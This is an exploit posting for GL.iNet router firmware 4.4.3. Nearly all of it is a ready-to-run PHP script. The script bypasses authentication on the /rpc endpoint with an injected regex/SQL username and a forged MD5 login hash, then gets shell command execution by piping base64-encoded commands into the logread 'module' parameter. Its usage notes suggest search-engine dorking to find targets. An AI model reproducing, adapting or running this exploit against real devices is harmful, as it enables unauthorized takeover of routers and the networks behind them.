Headline
GL.iNet 4.4.3 Code Injection
GL.iNet version 4.4.3 suffers from authentication bypass and code injection vulnerabilities.
=============================================================================================================================================| # Title : GL.iNet network 4.4.3 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://www.gl-inet.com/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 158 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GlinetExploit{ private $targetUri; private $sid; private $glinet; public function __construct($targetUri) { $this->targetUri = $targetUri; $this->glinet = [ 'model' => null, 'firmware' => null, 'arch' => null ]; } private function send_request($method, $uri, $data = null, $headers = []) { $ch = curl_init(); $options = [ CURLOPT_URL => $this->targetUri . $uri, CURLOPT_RETURNTRANSFER => true, CURLOPT_CUSTOMREQUEST => $method ]; if ($data) { $options[CURLOPT_POSTFIELDS] = $data; $headers[] = 'Content-Type: application/json'; } curl_setopt_array($ch, $options); $response = curl_exec($ch); curl_close($ch); return $response ? json_decode($response, true) : null; } public function check_vuln_version() { $postData = json_encode([ 'jsonrpc' => '2.0', 'id' => rand(1000, 9999), 'method' => 'call', 'params' => ['', 'ui', 'check_initialized', []] ]); $res = $this->send_request('POST', '/rpc', $postData); if ($res && isset($res['result'])) { $this->glinet['model'] = $res['result']['model']; $this->glinet['firmware'] = $res['result']['firmware_version']; } // Check for vulnerable models and firmware switch ($this->glinet['model']) { case 'sft1200': $this->glinet['arch'] = 'mipsle'; return version_compare($this->glinet['firmware'], '4.3.6', '=='); case 'ar750': case 'ar750s': $this->glinet['arch'] = 'mipsbe'; return version_compare($this->glinet['firmware'], '4.3.7', '=='); // Add more cases as per your requirement } return false; } public function auth_bypass() { if (!empty($this->sid)) { return $this->sid; } $postData = json_encode([ 'jsonrpc' => '2.0', 'id' => rand(1000, 9999), 'method' => 'challenge', 'params' => ['username' => 'root'] ]); $res = $this->send_request('POST', '/rpc', $postData); if ($res && isset($res['result']['nonce'])) { $nonce = $res['result']['nonce']; $username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+"; $pw = '0'; $hash = md5("$username:$pw:$nonce"); $postData = json_encode([ 'jsonrpc' => '2.0', 'id' => rand(1000, 9999), 'method' => 'login', 'params' => [ 'username' => $username, 'hash' => $hash ] ]); $res = $this->send_request('POST', '/rpc', $postData); if ($res && isset($res['result']['sid'])) { $this->sid = $res['result']['sid']; return $this->sid; } } return null; } public function execute_command($cmd) { $payload = base64_encode($cmd); $cmd = "echo {$payload}|openssl enc -base64 -d -A|sh"; $postData = json_encode([ 'jsonrpc' => '2.0', 'id' => rand(1000, 9999), 'method' => 'call', 'params' => [ $this->sid, 'logread', 'get_system_log', ['lines' => '', 'module' => "|{$cmd}"] ] ]); return $this->send_request('POST', '/rpc', $postData, ['Admin-Token: ' . $this->sid]); } public function check() { if ($this->check_vuln_version()) { return "Vulnerable: {$this->glinet['model']} | {$this->glinet['firmware']} | {$this->glinet['arch']}"; } return 'Not Vulnerable'; } public function exploit($command) { $this->sid = $this->auth_bypass(); if ($this->sid) { echo "SID: {$this->sid}\n"; echo "Executing: {$command}\n"; $this->execute_command($command); } else { echo "Authentication bypass failed.\n"; } }}// Usage$exploit = new GlinetExploit('https://target-url');$exploit->exploit('ls');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================